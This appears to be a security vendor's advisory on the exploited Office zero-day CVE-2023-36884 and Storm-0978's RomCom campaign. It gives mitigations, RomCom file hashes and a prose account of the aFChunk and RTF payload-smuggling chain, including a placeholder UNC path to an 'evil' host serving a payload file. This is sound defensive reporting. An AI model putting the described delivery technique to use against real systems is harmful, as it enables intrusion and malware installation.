Microsoft Office Zero-Day CVE-2023-36884 Exploited in the Wild

Microsoft has issued an advisory revealing a critical in-the-wild exploited Office and Windows HTML Remote Code Execution Vulnerability (CVE-2023-36884). The vulnerability is currently being actively exploited by a cybercrime group known as Storm-0978, which has a history of engaging in cybercrime and espionage activities.
Updated on
July 25, 2023
Published on
July 25, 2023
Read MINUTES
6
Subscribe to the latest industry news, threats and resources.

Category:  Vulnerability Intelligence

Vulnerability Class: Remote Code Execution

CVE ID: CVE-2023-36884

CVSS:3.0 Score:  8.3

Executive Summary

  • Microsoft released an advisory disclosing in-the-wild exploited Office and Windows HTML Remote Code Execution Vulnerability- CVE-2023-36884.
  • The vulnerability is under active exploitation by the Storm-0978 cybercrime group which has been detected to have been involved in cybercrime and espionage activities.
  • Storm-0978 is known to develop and distribute the RomCom backdoor on its victims’ networks.
  • Microsoft recommends the following mitigations:

    - Block all Office applications from creating child processes
    - Set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation.

Analysis

While Microsoft is still investigating the root cause of the vulnerability, the initial study suggests that:

  • The exploitation of CVE-2023-36884 requires the user to open a malicious document. 
  • Opening the malicious file leads to the download of a script that initiates iframe injection leading to the download of the final malicious payload.
  • The vulnerability starts with remotely hosted OOXML files, including DOCX and similar formats, which are internally structured as ZIP archives. Within these files, an XML-based relationship definition file plays a crucial role, with specific attention focused on the "aFChunk" relationship. Malicious samples exhibit the exploitation of this relationship by embedding RTF files as a means of payload smuggling. These embedded RTF files contain various objects responsible for executing malicious code, ultimately leading to malware download. Notably, two prominent objects are observed within the DOCX files, namely an OLE1 object and a CFB object, both utilized to exploit the "URLMoniker" link process.
  • OOXML File Structure:
    - OOXML files, such as DOCX, are inherently structured as ZIP archives, providing a convenient means of packaging and storing various components of the document.
  • XML-based Relationship Definition:
    -
    Within the DOCX file, an XML file serves as the relationship definition, facilitating the establishment of connections between different elements of the document.
  • Significance of "aFChunk" Relationship:
    -
    Of particular interest is the "aFChunk" relationship defined within the XML file. This relationship enables the embedding of one document within another, thus creating an avenue for payload smuggling.
  • Malicious Utilization of "aFChunk" Method:
    - Instances of malicious samples have been observed leveraging the "aFChunk" method to embed RTF files within DOCX files. This method serves as a vehicle for surreptitious payload delivery.
  • RTF Objects and Malware Payload:
    - Embedded within the RTF files are several objects that harbor the actual code responsible for facilitating the download and execution of malware.
  • OLE1 Object with UNC Path:
    - The initial object encountered is an OLE1 object containing a Universal Naming Convention (UNC) path leading to a remote IP address. Upon execution, this object retrieves a .URL file, exemplified by the path "\ip_address\to_evil\payload.url."
  • Exploitation of "URLMoniker" Link Process:
    - The second object, a CFB object, exploits the "URLMoniker" link process, furthering the propagation of the malicious activity.
Exploit & Infection chain detected by Volexity

Mitigation

  • To prevent exploitation of the vulnerability block all Office applications from creating child processes in endpoint security systems.
  • Set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation.
  • No OS restart is required, but restarting the applications that have had the registry key added for them is recommended in case the value was already queried and is cached.
  • Please note that while these registry settings would mitigate exploitation of this issue, it could affect regular functionality for certain use cases related to these applications. For this reason, we suggest testing. To disable the mitigation, delete the registry key or set it to “0”.
  • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION
  • Add the following application names to this registry key as values of type REG_DWORD with data 1"
    - Excel.exe
    - Graph.exe
    - MSAccess.exe
    - MSPub.exe
    - PowerPoint.exe
    - Visio.exe
    - WinProj.exe
    - WinWord.exe
    - Wordpad.exe

Screenshot of settings for the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION key


IOCs

ROMCOM dropper

3e7bf3a34c4dfa6abfce8254f213cbc98331504fa956b8d35e0961966593034f

ROMCOM loader

dd65c3ad7473f211ae661ccc37f8017b9697dfffb75d415cb035399c14bc1bc9

ROMCOM worker

7424de0984159e0c01da89a429e036835f253de35ec2bdade0b91db906ec54ec

ROMCOM networking

96d1cd0a6038ee295b02f038a30ac756bae0ee5ae26f5a64637adf86777d7e14

ROMCOM dropper

ca0ccf331b2545102452e3b505a64444f50ab00d406564dda6ea5987f0194208

ROMCOM networking

597dd1e09bd23cd18132ce27a731d0b66c78381e90292ece0f23738773743a7c

ROMCOM loader

ad39ad35084d8339744299def3af979e666add8103ebd706de3cd1430d3ca8a1

ROMCOM worker

ac1fce0ca42f05d54dfbf96415d558f9de1c87abc940531a051536d97bee5c32

ROMCOM dropper

116ec1c306a2ee93ad5371d189bdbc15b23588be0322622b329f763c7f8622f1

ROMCOM networking

615bfe8f7f3903bb380f59bca6339d1b37125cc9d303f935e7197ff0706fded7

ROMCOM loader

e58fcd4a8d13cb1847f08fd3db6f86473c589f935bcf76ff2837bfac3e8f8f6e

ROMCOM dropper

3b26e27031a00a32f3616de5179a003951a9c92381cd8ec552d39f7285ff42ee

ROMCOM loader

916153d8265a2f9344648e302c6b7b8d7e1f40f704b0df83edde43986ab68e56

ROMCOM worker

e7914f823ed0763c7a03c3cfdbcf9344e1da93597733ac22fe3d31a5a4e179aa

ROMCOM networking

3e293680e0f78e404fccb1ed6daa0b49d3f6ea71c81dbaa53092b7dd32e81a0d

ROMCOM networking

0501d09a219131657c54dba71faf2b9d793e466f2c7fdf6b0b3c50ec5b866b2a

ROMCOM loader

65778e3afc448f89680e8de9791500d21a22e2279759d8d93e2ece2bc8dae04d

ROMCOM worker

2ba51d7e338242bc6a8109317b91dd13137e296693c535ceacc1288775acc81f

ROMCOM networking

7c72e817069bc966a8166a701da397508d44fe9da0e72a047fcf3d694eee81e9

ROMCOM loader

555ef671179b83989858b6d084b3aee0a379c9d8c75ca292961373d3b71315f8

ROMCOM worker

244885707e1ccfb02160ae60d749bafcfbcfd1d2572afed9113010609cd43820



References

#Traffic Light Protocol - Wikipedia

Get Global Threat Intelligence on Real Time

Protect your business from cyber threats with real-time global threat intelligence data.. 30-day free and No Commitment Trial.
Schedule a Demo
Real time Threat Intelligence Data
More information and context about Underground Chatter
On-Demand Research Services
Dashboard mockup
Global Threat Intelligence Feed

Protect and proceed with Actionable Intelligence

The Global Cyber Threat Intelligence Feed is an innovative platform that gathers information from various sources to help businesses and organizations stay ahead of potential cyber-attacks. This feed provides real-time updates on cyber threats, including malware, phishing scams, and other forms of cybercrime.
Trusted by 400+ Top organisations